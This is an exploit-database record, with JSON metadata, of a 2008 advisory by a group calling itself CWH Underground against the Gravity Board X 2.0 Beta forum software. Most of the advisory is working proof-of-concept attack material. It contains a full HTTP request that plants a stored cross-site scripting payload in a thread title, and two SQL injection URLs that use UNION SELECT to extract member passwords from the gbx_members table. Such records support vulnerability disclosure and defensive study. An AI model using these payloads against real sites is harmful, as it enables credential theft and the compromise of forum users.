Gravity Board X 2.0 Beta (SQL/XSS) Multiple Remote Vulnerabilities

2008-06-12T00:00:00

Description

Exploit for unknown platform in category web applications

{"id": "1337DAY-ID-3161", "type": "zdt", "bulletinFamily": "exploit", "title": "Gravity Board X 2.0 Beta (SQL/XSS) Multiple Remote Vulnerabilities", "description": "Exploit for unknown platform in category web applications", "published": "2008-06-12T00:00:00", "modified": "2008-06-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/3161", "reporter": "CWH Underground", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-04T07:11:44", "viewCount": 6, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/3161", "sourceData": "==================================================================\r\nGravity Board X 2.0 Beta (SQL/XSS) Multiple Remote Vulnerabilities\r\n==================================================================\r\n\r\n\r\n\r\n ,--^----------,--------,-----,-------^--,\r\n | ||||||||| `--------' | O\t.. CWH Underground Hacking Team ..\r\n `+---------------------------^----------|\r\n `\\_,-------, _________________________|\r\n / XXXXXX /`| /\r\n / XXXXXX / `\\ /\r\n / XXXXXX /\\______(\r\n / XXXXXX / \r\n / XXXXXX /\r\n (________( \r\n `------'\r\n\r\nAUTHOR : CWH Underground\r\nDATE : 12 June 2008\r\n\r\n\r\n#####################################################\r\nAPPLICATION : Gravity Board X\r\nVERSION : 2.0 Beta\r\nDOWNLOAD : http://downloads.sourceforge.net/gbx\r\n#####################################################\r\n\r\n+++ Remote Stored XSS Exploit +++\r\n\r\n When you create new thread in forum, you can inject javascript in title field.\r\n\r\n-----\r\n POC\r\n-----\r\n\r\n[+]POST http://192.168.0.4/gbx/index.php?action=postnewsubmit&board_id=1 HTTP/1.1\r\n[+]Host: 192.168.0.4\r\n[+]User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n[+]Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n[+]Accept-Language: en-us,en;q=0.5\r\n[+]Accept-Encoding: gzip,deflate\r\n[+]Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n[+]Keep-Alive: 300\r\n[+]Connection: keep-alive\r\n[+]Referer: http://127.0.0.1/gbx/index.php?action=postnew&board_id=1\r\n[+]Cookie: PHPSESSID=507c211a3be817f7e7fcf51b3886665a\r\n[+]Content-Type: application/x-www-form-urlencoded\r\n[+]Content-Length: 128\r\n[+]subject=POC+%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&FCKeditorContents=POC+XSS+Thread&formsent=&board_id=1&submit=Post\r\n\r\n+++ Remote SQL Injection Exploit +++\r\n\r\n** magic_quotes_gpc = Off **\r\n\r\n-------------\r\n POC Exploit\r\n-------------\r\n\r\n[+]http://[target]/[gbx_path]/index.php?action=getsearch&orderby=dateposted&searchquery=')/**/union/**/select/**/pw/**/from/**/gbx_members/**/where/**/memberid=1/*&byuser=&searchin=submess\r\n[+]http://[target]/[gbx_path]/index.php?action=viewboard&board_id=1'/**/union/**/select/**/1,pw,3/**/from/**/gbx_members/*\r\n\r\n##################################################################\r\n# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #\r\n##################################################################\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "_state": {"dependencies": 1646749280, "score": 1659766679}}